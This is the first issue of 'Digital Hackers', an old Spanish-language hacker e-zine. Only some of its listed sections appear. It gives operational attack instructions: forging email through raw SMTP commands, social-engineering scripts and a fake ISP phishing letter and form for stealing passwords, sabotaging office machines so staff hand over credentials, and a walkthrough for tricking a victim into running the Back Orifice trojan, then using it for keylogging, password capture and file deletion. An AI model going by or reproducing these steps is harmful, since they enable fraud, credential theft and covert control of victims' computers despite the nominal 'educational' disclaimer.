Como mandar e-mail anonimo, conseguir un dominio para tu web, historia del hacking 1, intro a la ingenieria social, intro a la ingenieria social inversa, back orifice, tarjetas telefonicas, BILL GATES ES EL DIABLO?, defectos de windows, actualidad en el underground, moral de un hacker, obteniendo contraseñas, echelon nos vigila..., ping de la muerte, linux, virus, agenda de un lamer, entrevista a william gibson, radioaficionados: frecuencias V.H.F, la viruteca de digital hackers (virus 1 - tomo I), la zona X - password de acceso.....
Texto Completo:
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º ²²²²²² ²²² ²²²²²²²²² ²²² ²²²²²²²²² ²²²²² ²²² º
º ²²² ²²²² ²²² ²²² ²²² ²²² ²²² ²²² ²²² º
º ²²² ²²² ²²² ²²² ²²² ²²² ²²² ²²² ²²² º
º ²²² ²²² ²²² ²²² ²²²² ²²² ²²² ²²²²²²²²² ²²² º
º ²²² ²²²² ²²² ²²² ²²² ²²² ²²² ²²² ²²² ²²²²²²² º
º ²²²²²² ²²² ²²²²²²²²² ²²² ²²² ²²² ²²² ²²²²²²² º
º º
º ²²² ²²² ²²²²² ²²²²²² ²²² ²²² ²²²²²² ²²²²²²² ²²²²²² º
º ²²² ²²² ²²² ²²² ²²²²²² ²²² ²²² ²²² ²²² ²² ²²² º
º ²²²²²²²²² ²²² ²²² ²²² ²²²²²² ²²²²²² ²²²²²²² ²²²²²² º
º ²²²²²²²²² ²²²²²²²²² ²²² ²²²²²² ²²²²²² ²²²²² ²²² º
º ²²² ²²² ²²² ²²² ²²²²²² ²²² ²²² ²²² ²²² ²²² ²²² º
º ²²² ²²² ²²² ²²² ²²²²²² ²²² ²²² ²²²²²² ²²² ²²² ²²²²²² º
º º
º "El hacking en el nuevo Milenio" º
º º
º Frase:"Lo que una mente crea otra lo supera" º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º El contenido expuesto aqui es totalmente con fines educativos,º
º no nos hacemos responsables por lo que hagas con el o lo que º
º el te haga a ti. Si no estas de acuerdo con lo anterior apaga º
º el ordenador y vete a lamear por ahi. º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
EDICION N§1
CONTENIDO:
1. EDITORIAL DE DIGITAL HACKERS.
2. COMO MANDAR E-MAIL ANONIMO By technohacker
3. ¨COMO CONSEGUIR EL DOMINIO PROPIO PARA TU WEB? by HacKZombi
4. HISTORIA DEL HACKING (I)
5. INTRODUCCION A LA INGENIERIA SOCIAL By HacKZombi
6. INTRODUCCION A LA INGENIERIA SOCIAL INVERSA By HacKZombi
7. BACK ORIFICE.
8. EL RINCO DE LA ELECTRONICA: Tarjetas Telefonicas By mattews
9. ¨BILL GATES ES EL DIABLO? SACA TUS CONCLUSIONES...
10. DEFECTOS DE WINDOWS.
11. ACTUALIDAD EN EL UNDERGROUND.
12. MORAL DE UN HACKER By Morfeo
13. OBTENIENDO CONTRASE¥AS (I) By Morfeo
14. ECHELON NOS VIGILA...
15. PING DE LA MUERTE by technohacker
16. LINUX.
17. VIRUS by technohackers
18. CONVERTITE EN REPORTERO.
19. CONCURSOS.
20. AGENDA DE UN LAMER (I) By hackzombi
21. LAS 10 MEJORES WEB.
22. ENTREVISTA A WILLIAM GIBSON.
23. RADIOAFICIONADOS: FRECUENCIAS V.H.F.
24. LA VIRUTECA DE DIGITAL HACKERS (VIRUS 1 - TOMO I)
25. LA ZONA X - PASSWORD DE ACCESO.
26. GLOSARIO.
27. HISTORIAS DE OTRAS ORGANIZACIONES: "TECHNOHACKERS TEAM".
28. CARTAS DE LOS LECTORES.
29. PROXIMO NUMERO...
30. DESPEDIDA
1.EDITORIAL DE DIGITAL HACKERS
Que tal queridos lectores, hoy es un magnifico dia en el cyberespacio ya que
lanzamos la primer edicion de esta revista llamada Digital Hackers, cuyo
proposito es informar acerca de fallos de seguridad, hacking, cracking, y
todo lo relacionado con el mundo underground.
La informacion que publicaremos en las distintas ediciones es totalmente con
propositos educativo y/o cientificos, por lo tanto ni nosotros, ni los
colaboradores se hacen responsables por el uso que le des al material
expuesto.
Ya aclaradas las pautas, pasaremos a contarles como sera la estructura de la
revista.
- Esta te llegara por E-mail cada 30 dias o podras bajarla del sitio oficial:
www.dighack.cjb.net o en sus distribuidores oficiales:
Area54: www.area54teams.com
Powerhack: www.powerhacking.com
- Para una mejor visualizacion de esta e-zine se recomienda el EDIT.
- Se han omitidos las tildes por comodidad.
- Los textos expuestos en la revista son creados exclusivamente por los
editores o por sus colaboradores.
- Si te interesa publicar un articulo en la revista (relacionado con la
informatica y electronica) puedes hacerlo libremente enviandolos a:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
- Puedes distribuir esta e-zine libremente mientras no se modifique el
contenido y los derechos reservados por los autores.
Si deseas poner los zip en tu sitio web puedes hacerlo libremente siempre
y cuando se respete lo anteriormente dicho.
- Debido a que esta revista es nueva en la red te pedimos una peque¤a
colaboracion:
Recomendanos a tus amigos, primos, conocidos, a los que tenes en la lista
del icq y a todos las personas que puedas para que este e-zine cada vez
tenga mas lectores.
- Tenemos habilitada la seccion del lector donde responderemos todas sus
dudas, sugerencias y preguntas.
Los E-mail que ustedes envien seran respondidos en la seccion correo del
lector salvo en caso particulares.
El E-mail para enviarnos sus dudas es:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Esto fue todo amigos pasemos a la primer edicion de Digital Hackers.
2.COMO ENVIAR E-MAIL ANONIMO
Esta tecnica nos ayuda a suplantar la direccion de correo electronica que
queramos. La verdad es que tiene pocos usos, en mi opinion debido a
una serie de razones pero siempre puede servir para gastar una buena
broma enviando aun amigo un mail del director de la Universidad diciendo
que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la
Nacional Civil. (bueno que esos burros ni escribir saben)
La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar
unas ciertas medidas de seguridad. Lo primero que tenemos que hacer es
ejecutar el cliente Telnet (sobre el manejo del Telnet y donde pone "puerto"
en vez de poner el puerto 23 pondremos el 25 que corresponde al puerto del
mail y esperamos a que nos conectemos a ese puerto, cuando conectemos nos
saldra un mensaje y esta esperando a que pulsemos alguna tecla:
220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
[d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)
Muchas veces lo que podemos hacer es escribir "help" y saldran todos los
comandos, tambien podemos escribir "echo" y la maquina nos contestara que
esta lista. Para escribir un mail hay que seguir una serie de pasos:
mail from:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<- ponemos de donde viene.
El servidor nos contesta:
250 <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
> ... Sender Okay
Ahora escribimos:
rcpt to:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<- a quien se lo enviamos.
El servidor nos contesta:
250 <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
> ... Recipiant Okay
Ahora escribimos:
data
El servidor nos contesta:
354 Enter mail, end with "." on a line by itself
Ahora escribimos:
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
From:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Subject: Te querremos!!
Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te querremos
fichar para el departamento.
Direccion General de Ministerio publico
. <- para terminar el mail.
El servidor nos contesta:
250 Mail accepted
Ahora escribimos:
quit <- ya esta todo listo J
Pues ves como es realmente simple!! Pero antes de empezar a jugar con esta
tecnica tenemos que asegurarnos que el servidor de mail no registra nuestro
IP, esto lo podremos averiguar si enviamos un mail de prueba a alguna cuenta
anonima que tengamos. Si vemos que en la cabecera del mail sale nuestro IP
ese servidor no sirve. Hay listas disponibles por Internet sobre servidores
que permiten hacer esto.
Autor: technohackers
web: www.technohackers.cjb.net
3.¨COMO CONSEGUIR EL DOMINIO PROPIO PARA TU WEB?
Para las personas que esten interesadas en tener el dominio propio para su
web en 1 dia les recomendamos la pagina www.namezero.com, en ellla podes
sacar dominios del tipo: .com .net .org, tambien ofrece el redireccionamiento
de e-mail propio a uno comun.
Por ejemplo hacker@tudominio.(com,net,org) te lo redirecciona a la direccion
real que vos elijas.
4.HISTORIA DEL HACKING
Podriamos empezar diciendo que el hacking comienza desde la invencion del
ordenador frente a los tiempos de Hoy.
Pero la gran motivicion Hacker se dio a traves de una famosisima pelicula
llamada Juegos de Guerra (1983) esta misma pelicula mostraba a un estudiante
secundario provocando una fantasiosa guerra Termonuclear Global de aqui en
adelante muchisimos jovenes se inspiraron en realizar algo de lo mas parecido,
y lo hicieron ...
Aqui en argentina el hacking hoy en dia es de lo muy poco popular
Uno de los mas conocidos hackers es el famoso "chacal". Esta es una entrevista
a el extraida del texto "llaneros solitarios" :
- Que motiva a un hacker?
- Muchas cosas, pero sobre todo la curiosidad. Si en el mundo
todas las personas fueran conformistas, no avanzarian. si
fueran todos curiosos o aventureros, se extinguirian. El
equilibrio esta en la existencia de un quince o veinte por
ciento del segundo grupo.
- Y para que sirven?
- El curioso cumple un rol de vanguardia: muere intentando
descubrir algo o permite el acceso del resto a una situacion.
Cuando ve algo distinto, se pregunta que habra mas alla y no se
detiene hasta averiguarlo. Asume el riesgo solo, pero si le va
bien se benefician los demas.
- Como?
- Una vez que tiene la respuesta vuelve al grupo con la
novedad, los hace participes de su descubrimiento y de los
beneficios que ello acarrea. Siempre habra algo que lo haga
regresar a la comunidad: un amigo, una novia, pede ser
cualquier cosa. Este proceso es tan antiguo como la humanidad,
solo que ahora se usa una nueva herramienta, la computadora,
en este caso para el cerebro.
- Descripto en esa forma, no se constituye en uno de los ultimos costados
romanticos de la decada?
- Si, somos romanticos. Recuerdo que nos gustaba decir que
eramos "Los caballeros de las redes".
Este nombrado hacker hoy actualmente es encargado de seguridad en una famosa
empresa.
Aqui en Argentina los nombres mas usados al oir "hackers" son el griton o
mejor dicho Julio Ardita quien penetro en los sistemas del pentagono.
CONTINUA EN LA PROXIMA EDICION...
õõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõ
õõõ 5.INGENIERIA SOCIAL: (Para principiantes) õõõ
õõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõ
Esta es una tecnica muy usada para apoderarnos de contrase¤as, pasaremos
a la explicacion:
La ingenieria social (IS) es la forma de convencer hablando a una persona
para que nos revele algo,por ejemplo la contrase¤a de acceso a un sistema.
Existen diferentes formas de realizar la ingenieria social (IS) pasaremos a
explicar algunas de ellas, las demas las crearas vos con tu ingenio.
1_EL NUEVO:
Consiste en hacerse pasar por un nuevo empleado de la empresa y llamar al
centro de seguridad o al encargado de dicha empresa y pedir ayuda.
EJ:
HACKER: (llama al encargado o al centro de seguridad de la empresa que
tiene como objetivo averiguar la contrase¤a)
RING.RING.RING. (Atiende el encargado):
ENCARGADO: - Centro de seguridad, habla Frank, ¨en que lo puedo ayudar?
HACKER: - Hola, habla el se¤or (un nombre falso a no ser que quieras
ir preso) del departamento de computacion.
ENCARGADO: - ¨Si que necesita?
HACKER: - Bueno resulta que es mi primer dia aqui y me han asignado
encender el sistema. Me dijeron que alguien me indicaria
como, pero aun no ha llegado nadie. ¨podria usted ayudarme?
ENCARGADO: - Si como no, sientate en la computadora
HACKER: - Listo ya estoy.
ENCARGADO: - ¨Ves el boton que dice POWER?
HACKER: - Si lo estoy observando.
ENCARGADO: - Oprimelo y espera un poco a que arranque.
HACKER: - Ya se ha detenido.
ENCARGADO: - ¨Que aparece?
"esta es una pregunta muy comprometedora por lo cual habra que buscar una
rapida respuesta para que no dude"
HACKER: - Lo de siempre
ENCARGADO: - Ahora tipea lo de siempre.
HACKER: - Pero ¨que es lo de siempre?, es mi primer dia aqui y me
dijeron que alguien me indicaria paso a paso como arrancar el
sistema.
ENCARGADO: - Lo habia olvidado, ¨ves que te pide un LOGIN?
"nos hacemos los que desconocemos que es un login"
HACKER: - Si, ¨que es?
ENCARGADO: - Es el nombre de acceso, escribe ROOT en mayuscula y presiona
enter.
HACKER: - Ya esta ahora pide un password.
ENCARGADO: - Tipea USER287 en mayuscula y presiona enter.
HACKER: - Listo.
ENCARGADO: - Ya esta.
HACKER: - Muchas gracias Frank, ahora no tocare nada hasta que vengan
a darme las explicaciones de lo que debo hacer.
ENCARGADO: - O.k., que te vaya bien.
CONCLUSION: Con este ejemplo mostramos como con un poco de manipulacion de la
palabra y la seguridad al hablar, podemos averiguar la contrase¤a.
Para poder aplicar este ej. debe ser un horario donde aun la
mayoria del personal de la empresa no entro a trabajar.
Muchas personas por medio de esta tecnica se lograron de hacer de
contrase¤as importantes, quien sabe tal vez el proximo seas tu.
2_EL FAMILIAR DESCONOCIDO:
Esta da muy buenos resultados, se basa en hacerse pasar por un familiar
de alguna persona que este buscando a otra. Te preguntaras de que forma
te enteraras a quien busca.
Muy sencillo:
1) Usaremos el NetMeeting, nos conectamos algun server.
2) Una vez dentro buscamos algun nombre que nos agrade.
3) Pedimos la informacion de dicha persona.
4) En la parte que dice "comentario" mucha gente pone el nombre del familiar
que esta buscando (lo utilizan para comunicarse con algun familiar que se
fue a otro pais). Leemos que dice y tal vez en el primer intento
encontramos lo que buscamos.
5) Ya encontrado a alguien que busca a algun familiar nos desconectamos y nos
cambiamos nuestra informacion personal (incluyendo el nombre) por los datos
de la persona buscada.
6) Nos volvemos a conectar.
7) Volvemos a buscar a la persona que enga¤aremos.
8) Y ahora hay que ingeniarselas para hacernos pasar por el familiar
9) Un rato despues de haber entrado a charlar sobre como le fue la vida le
comentamos que no nos pudimos conectar a tiempo ya que el server que
teniamos ya no funciona (trata de fingir lo mejor posible, cuando te
pregunte cosas sobre tu vida personal cambiale de tema disimuladamente)
10)Le decimos que por un tiempo no vamos a poder hablar con ellos, por este
motivo.
11)Seguramente nos brindara su login y clave de su server (somo su familia no)
12)Nos despedimos con un pretexto de que tenemos que hacer algo urgente.
13)Mision cumplida.
Nota: El peligro de esta tecnica es si aparece en verdad el familiar y se nos
acaba la farsa.
3_EL IMPORTANTE:
Consiste en hacernos pasar por una persona importante como un militar,
gefe, o otra persona con bastante importancia sobre la victima (esta puede
ser una secretaria, el del departamento de seguridad, etc).
Debemos aparentar ser rudos, prepotentes y demostrando siempre que somos
superior a la victima.
EJ:
SECRETARIA: ¨Buenas .....?
RUDO: QUE TAL, HABLA EL CORONEL RUIZ, ESTUVE FUERA DE LA CIUDAD
DURANTE 7 DIAS Y APENAS LLEGO ME E LLEVADO LA SORPRESA QUE ME
HAN DADO DE BAJA MI CUENTA. HABILITE ME LA CUENTA RAPIDAMENTE,
PORQUE LE PUEDE OCASIONAR UN GRAN PROBLEMA AL GOBIERNO.
"con estas palabras la ponemos en una mala circunstancia a la secretaria
ya qu no sabre que decidir"
SECRETARIA: Bueno sigue siendo aun el mismo login: HIMBREYIM y la
contrase¤a: 927826 , ya esta dada de alta nuevamente.
RUDO: MUCHAS GRACIAS, ESPERO NO VOLVER A TENER ESTOS PROBLEMAS EN
EN EL FUTURO.
CONCLUCION: Mediante esta tecnica tambien se logran buenos resultados siempre
y cuando todos los factores (estado de animo de la secretaria,
grado de ignorancia, inteligencia del rudo, etc.) nos favorescan.
4_ IS ESCRITA:
Este es un metodo muy conocido y que da muy buenos resultado, consiste en
hacernos pasar por alguien mediante una carta, un correo electronico, etc.
Una forma que no falla es mandarle un E-mail a uno de esos tontos lamer
que conocemos haciendonos pasar por el provedor de servicios de internet
(ISP) diciendo que por una falla del sistema hemos perdido sul nombre de
usuario y contrase¤a y que nos conteste a la brevedad a X direccion de
E-mail o se le dara de baja la conexion.
¨Y como le mando un E-mail haciendonos pasar por el server?
Facilmente, utilizamos lo aprendido en la seccion 2 "Como mandar E-mail
anonimos". Cabe aclarar que para enviar el E-mail anonimo debemos buscar
un server que no les envie nuestro IP
EJ DE UNA CARTA FALSA ENVIADA POR NOSOTROS A "X" LAMER:
Estimado "el nombre del lamer":
Debido a inconvenientes ocurridos el "una fecha anterior al envio de la
carta" hemos detectado que varios de nuestros clientes han sido borrados
de nuestro servidor. Uno de ellos es usted por lo cual necesitamos que
vueva a completar la solicitud de inscripcion de lo contrario se le dara
de baja la cuenta el "la fecha que se nos antoje".
Le pedimos mil disculpa por molestarlo y le descontaremos el 50% de la
factura por los da¤os ocasionado.
Rogamos que nos envie el siguiente formulario antes del: "fecha antojada"
Nombre:____________________________
Apellido:__________________________
Direccion:_________________________
Telefono:(____)_______-____________
Fax:_______________________________
Nombre de usuario:_________________
Contrase¤a anterior:_______________
Nueva contrase¤a:__________________
Le garantizamos que los datos actualizados ya estaran habilitados a partir
del "otra fecha antojada", de todas maneras se le notificara via E-mail.
Por favor guarde una copia de este E-mail por su seguridad.
Atentamente: "el nombre del director o presidente de la empresa y para mas
credibilidad le ponemos una firma falsa"
5) DIVERSAS FORMAS:
Otros ejemplo de IS son:
a) Cuando te enteras que hay una falla en algun empresa, te puedes hacer
pasar por el tecnico. Llamas a la secretaria y le preguntas:
HACKER: Habla Richard Zerk de Mantenimiento compushop y nos
informaron que tienen inconvenientes con sus pc.
SECRETARIA: Si asi es, el sistema no arranca.
HACKER: ¨Que era lo que hacias normalmente cuando se inicializaba el
sistema?
SECRETARIA: Me pedia una contrase¤a y entraba a windows nt.
HACKERS: No te preocupes, ya hemos descubierto la causa del problema,
nos podrias decir tu nombre y a la brevedad te volveremos a
llamar cuando solucionemos el inconveniente.
HACKER: Si claro, Camila.
SECRETARIO: Ha por cierto ¨que tipeabas de contrase¤a usualmente?
SECRETARIA: cam567
HACKER: O.k. en instante te llamaremos para decirte lo que debes
hacer.
b) Otra forma es haciendonos pasar como que hacemos propaganda de un server y
le damos un cuestionario para que complete, y ganara una semana de prueba.
En medio de la charla le damos un formulario para completar donde una de
las preguntas es la contrase¤a de su server y si desea que utilize la
misma para la semana de prueba.
Parece un metodo un tanto estupido, pero a mas de un hacker le dio
resultado.
EJ DE UN FORMULARIO:
INTERNET GRATIS POR UNA SEMANA
Completando el siguiente formulario usted probara nuestro servidor por
una semana sin costo alguno.
NOMBRE:___________________________________
APELLIDO:_________________________________
DIRECCION:________________________________
LOCALIDAD:________________________________
TELEFONO:_________________________________
E-MAIL:__________________________________
¨TIENE ACTUALMENTE UN SERVIDOR DE INTERNET? SI - NO
¨ESTA CONFORME CON EL SERVICIO QUE LE BRINDA? SI - NO
CONTRASE¥A DE SU SERVER:(SI ES QUE TIENE UNO):
QUIERE USAR LA MISMA CONTRASE¥A: SI - NO
SI ES NO ESCRIBA SU NUEVA CONTRASE¥A:________________
Esta cuenta se dara de alta dentro del plazo de una semana. Usted sera
notificado via E-mail.
CONSEJOS:
1) Siempre que te estes haciendo pasar por alguien ya sea por telefono o
personalmente demuestra que eres importante, si es una IS de persona a
persona vete bien vestido (con el mejor traje que tengas) porque eso
influye mucho en el otro individuo.
2) Antes de aplicar la ingenieria social, debes tratar de conocer todo
sobre la persona, el lugar, y lo relacionado con el.
3) Usa todo tu ingenio para conseguir lo que deseas.
el lugar,datos personales
Esto fue todo amigos, recuerden que esto fue nivel basico por lo tanto en la
proxima edicion saldra la "Parte II".
Autor: ^HacKZombi^
E-mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
õõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõ
õõõ 6.INGENIERIA SOCIAL INVERSA: (Para principiantes) õõõ
õõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõ
La ingenieria social inversa tambien conocida por ISI o por II es un poco mas
riesgosa pero sus resultados son mejores que la ingenieria social.
Esta tecnica solo la pueden realizar hackers con talento, por lo tanto si es
la primera vez que escuchas esto primero deberas conocer un poco mas antes de
aplicarla.
Basicamente consiste en lo inverso a la ingenieria social (IS) ya que su
objetivo es el mismo, pero cambia la manera de actuar, nosotros no iremos
a buscar a la victima, ella vendra a nosotros. Interesante ¨no?
LAS DIFERENCIAS BASICAS SON:
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
Ü DIFERENCIAS ENTRE INGENIERIA SOCIAL E INGENIERIA SOCIAL INVERSA Ü
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
Ü INGENIERIA SOCIAL ÜÜ INGENIERIA SOCIAL INVERSA Ü
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
Ü -Vos los buscas. ÜÜ -Ellos te llaman. Ü
Ü -Vos los necesitas a ellos. ÜÜ -Ellos te necesitan a ti. Ü
Ü -Puede funcionar en todos lados. ÜÜ -Solo funciona en algunos lados. Ü
Ü -La victima puede sospechar. ÜÜ -La victima no sospecha. Ü
Ü -No exige muchos conocimiento de ÜÜ -Debes averiguar varios datos de la Ü
Ü la victima. ÜÜ victima. Ü
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
Las desventaja de la ingenieria social es que muchas personas (programadores,
otros hackers) saben de ingenieria social por lo cual se dara cuenta
rapidamente lo que intentamos hacer.
Otra desventaja es que para que la persona caiga debe ser ingenua, la mayoria
de las secretarias saben por que les dijo el gefe o alguien que no le deben
decir la contrase¤a a nadie.
La ingenieria social inversa se basa en sabotear una maquina para que funcione
mal hasta que nosotros decidamos solucionar la falla, algunos ejemplos son:
* Poner los archivos en solo lectura o cambiarlos de directorio para que
no funcionen al ejecutarlos.
* Un programa residente.
* Un programa que manda mensaje de errores pero en verdad todo anda bien.
* Desconectar algun periferico que utilizen muy a menudo.
* Cambiar algun parametro importante como: los colores del monitor,el puerto
por defecto de la impresora o otra cosa que no sepan configurar.
En la ingenieria social inversa hay 3 pasos importantes:
- La publicidad.
- La amable ayuda.
- El sabotaje.
El primer paso es provocar un desperfecto en la computadora a hackear (de
ahora en mas la llamaremos x pc) y luego que nos llamen a nosotros para
repararla.
Para que nos llamen a nosotros deberemos hacer publicidad. Esto se puede hacer
dejando una nota en la oficina donde se encuentra "x pc" que diga:
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º COMPUFLASH º
º SERVICIO TECNICO DE PC º
º LAS 24 HS º
º Reparacion de pc consultas º
º sin cargo. º
º º
º TEL: 8795552547 Preguntar º
º por Gord. Pancho º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Una vez que nos llaman para solucionar la falla del sistema, acudimos al lugar
y empieza nuestra actuacion de donde podria estar la falla. Para poder entrar
y arreglar el sistema nos tendran que decir la contrase¤a, (al menos que no
confien en nosotros). Ya finalizado nuestros objetivos de investigacion
tendremos que solucionar el sabotaje ocasionado.
ALGUNOS METODOS DE PUBLICIDAD:
- Si la empresa tiene ya el numero de telefono en una pizarra de su empresa
de confianza, lo sacamos y ponemos el nuestro
- En las aplicaciones que suelen utilizar mas seguido dejamos nuestro datos.
- Unos dias antes del hackeo realizamos un llamado a dicha empresa y les
informamos que hemos cambiado el numero de telefono (haciendonos pasar por
la empresa de confianza de ellos).
- Por medio de un anuncio grande en la oficina de la empresa.
- Por un folleto que arrojamos dias antes del hackeo.
Hay que tratar de que la empresa nos tenga toda la confianza que podamos asi
jamas dudara de nosotros.
Buena suerte y hasta la proxima.
Autor: ^HacKZombi^
E-mail:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
7.Back Orifice
Explicacion
Este texto pretende explicar el uso del BO en w95 y las posibles aplicaciones
que se le pueden dar en IRC. De ningun modo se pretende incitar a la ilegalidad
y este documento se redacta con fines educativos, para la investigacion
y prevencion del ataque.
Una parte de este articulo consiste en la recopilacion y traduccion del trabajo
de otros.
- ¨Que es el BO?
Es un troyano que se aprovecha de los bugs de seguridad del w95/98.
Con este programa podremos tener acceso a todo el sistema del infectado:
Disco duro, cdrom, disketera, y por supuesto a sus archivos y directorios,
pudiendo borrarlos o modificarlos, bajarlos a su propio disco duro...
- ¨Donde conseguir este magnifico exploit?
BO se puede conseguir en las siguiente direccion:
www.area54teams.com (download).
Para mayor informacion visitar:
www.rootshell.com/
- ¨Que hago cuando baje el zip? ¨Que contiene?
Una vez que bajamos el zip hay que descomprimirlo (aclarado para los "lerdos")
y luego verificar que contenga los siguientes archivos:
bo.txt
plugin.txt
boserve.exe Servidor
bogui.exe Cliente
boclient.exe Cliente en modo texto del BO
boconfig.exe Utilidad de configuracion y plugin del server de BO
melt.exe Descompresor de archivos comprimidos con el comando freeze
freeze.exe Compresor de archivos. SE pueden descomprimir con melt.
- ¨Que hago con todos estos archivos?
Para que todo funcione correctamente debes saber que BAJO NINGUN
CONCEPTO debes ejecutar boserve.exe, pues te infectaras y seras sencible al
ataque.
Ya realizados los pasos anteriores hay que averiguar la ip de algun lamer.
Despues hay que hacer que acepte el archivo que le enviamos: boserve.exe.
Y conseguir que lo ejecute.
Para conseguir esto tenes que ingeniartelas como sea: IRC, etc, etc.
Un metodo facil, pero que no da muchos resultados es renombrar boserve.exe
a fotos.exe, xxx.exe, pamela.exe y otras variables.
Resultara mas facil si tienes confianza con la victima.
- ¨Como entro a su ordenador?
Aca tienes los pasos a seguir:
1) Debes copiar "boclient.exe" en tu directorio raiz, c:\
2) Abrir una ventana de msdos en w95
3) Resolver la ip de la victima. Es muy facil de hacer en IRC.
d) En la ventana de msdos, desde la linea de comandos ejecutar
teclea "boclient.exe" a continuacion teclea host "IPdellamer en cuestion",
sin comillas.
e) Y si la ley de palometa no falla ya estas dentro. :>
- ¨Y ahora que hago?
Puedes hacer un monton de cosas. Desde bo tecleas dir. Te mostrara los
archivos de su disco rigido (HD).
Si tecleas passes te saldran cosas interesantes, o sea, algunas passwords.
Puedes teclear cd directorio para explorar. Como en MsDos.
Puedes abrirle el puerto http y ver su disco duro comodamente con tu
navegador, una vez dentro tienes que teclear httpon 80, o sea activar
el http y el puerto. Ejemplo: tiene conectado el http con otra cosa, se lo
cierras primero con httpoff y el puerto que tenga abierto.
- ¨como se el puerto que tiene abierto? ¨con un scaneado?
Ejecutas el httpon y te dice el estado del http y el puerto es decir,
le cierras los puertos que tenga abiertos y luego le abres el 80.
Otros comandos utiles:
Tambien podemos usar el modo texto, ejecutando el boclient.exe.
appadd Lanza una aplicacion de texto en un puerto tcp.
Para controlar una aplicacion dos o de texto (como el
command.com) via telnet.
appdel evita que una aplicacion oiga las conexiones.
applist Da un listado de las aplicaciones que escuchan la conexion
en ese momento.
md Crea un directorio.
dir Muestra los archivos y directorios.
rd Borra un directorio.
shareadd Crea un export en el servidor.
sharedel Borra un export.
copy Copia archivos.
del Borra archivos.
find Busca en el arbol los archivos.
freeze Comprime un archivo
melt Descomprime un archivo comprimido con freeze.
view Visor del contenido de un archivo.
httpoff Cierra el servidor http.
httpon Abre el servidor http.
keylog Logea las teclas que se aprietan en el servidor (victima) a un archivo de texto. El log muestra el nombre de la ventana en que se tecleo el texto.
keylog stopend Acaba el log de teclado.
capavi Captura video y audio de un dispositivo a un archivo .avi
capscreen Captura una imagen de la pantalla del server a formato .bmp
listcaps Da un listado de los dispositivos de entrada de video.
sound ejecuta un archivo de sonido en el servidor (Te lo imaginas?).
netlist Listado de las conexiones de red.
netdisconnect Desconecta el servidor de una red.
netconnect Conecta el servidor a una red.
netview Ve todas las interfaces de red, servidores, dominios .
ping Hace ping al host.
pluginexec Ejecuta un plugin para BO.
pluginkill Cierra el plugin.
pluginlist Da un listado de los plugin activos.
prockill Finaliza un proceso.
proclist Listado de los procesos en curso.
procspawn Ejecuta un programa.
rediradd Redirecciona los paquetes ip entrantes a otra ip
redirdel Para el redireccionamiento.
